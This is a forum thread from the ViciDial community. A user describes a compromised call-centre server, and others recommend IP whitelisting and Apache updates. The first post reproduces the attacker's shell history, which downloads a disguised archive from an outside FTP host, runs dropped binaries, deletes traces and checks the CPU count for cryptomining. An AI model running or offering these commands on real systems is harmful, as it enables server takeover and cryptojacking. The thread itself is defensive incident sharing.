vicidial.org

[Nefariousparity]

This server that I had,
VERSION: 2.14-708a
BUILD: 190414-0924
© 2019 ViciDial Group

Asterisk: 11.25.3-vici
SVN:3093

Version: 2.14b0.5
SVN Version: 3093
DB Schema Version: 1569
DB Schema Update Date: 2019-04-22 17:36:10

So far, here is the information I have gathered.

The attack works on dated version of Apache, I found this recent update on for opensuse.
https://lwn.net/Articles/785668/

The commands used in the attack are

cd /var/wwhmtl
331 cd /var/www/html
332 ls
333 cd /src/www/htdocs
334 locate httpd.conf
335 cat /etc/apache2/httpd.conf | grep DocumentRoot
336 zypper install -y libz.so.1 binutils gcc make gcc-c++
337 wget ftp://alias:password@90.181.191.230:/osdf.pdf
338 tar xvfz osdf.pdf
339 cd back
340 cp libcrypto.so.6 /usr/lib
341 ./zap
342 ./scp
343 ./inst
344 cd ..;rm -rf osdf.pdf; rm -rf back ;
345 cat /proc/cpuinfo| grep "processor"| wc -l

Zap is a service used to find more exploits in a system.
https://www.owasp.org/index.php/OWASP_Z ... xy_Project

You will notice all crontab entries are gone.

If you do a netstat -alnp one IP you may see is

5.196.58.15

Which leads to a Cyrpto mining site.

It would appear the goal is to turn your servers in to cyrpto miners and more. Resolution burn it down an rebuild, update and have stronger firewall.

[williamconley]

Whitelist Lockdown your servers. There will always be another exploit. Anything less than a whitelist is an invitation.

[Nefariousparity]

William, I totally agree.

[Kumba]

A white list is the way to go as long as it's being adequately maintained. Hell hath no fury like someone who can't login to something they could 30 minutes ago because their at-home IP changed.

Looks like if you are running Apache greater then 2.4.23 you should have this fix rolled into it already. So for those who are using ViciBox v.8.0 and up it should be as simple as running 'zypper up' to get this fix. Older versions not so much.

[williamconley]

Hell hath no fury like someone who can't login to something they could 30 minutes ago because their at-home IP changed.

Which is why many of our clients who have agents with rotating IPs will use the Dynamic Link as the agent's primary login (and in fact will generate one link per agent for ease of lockout down the road).

Still "Two Button Clicks" to log in just like the regular login pages from vicidial.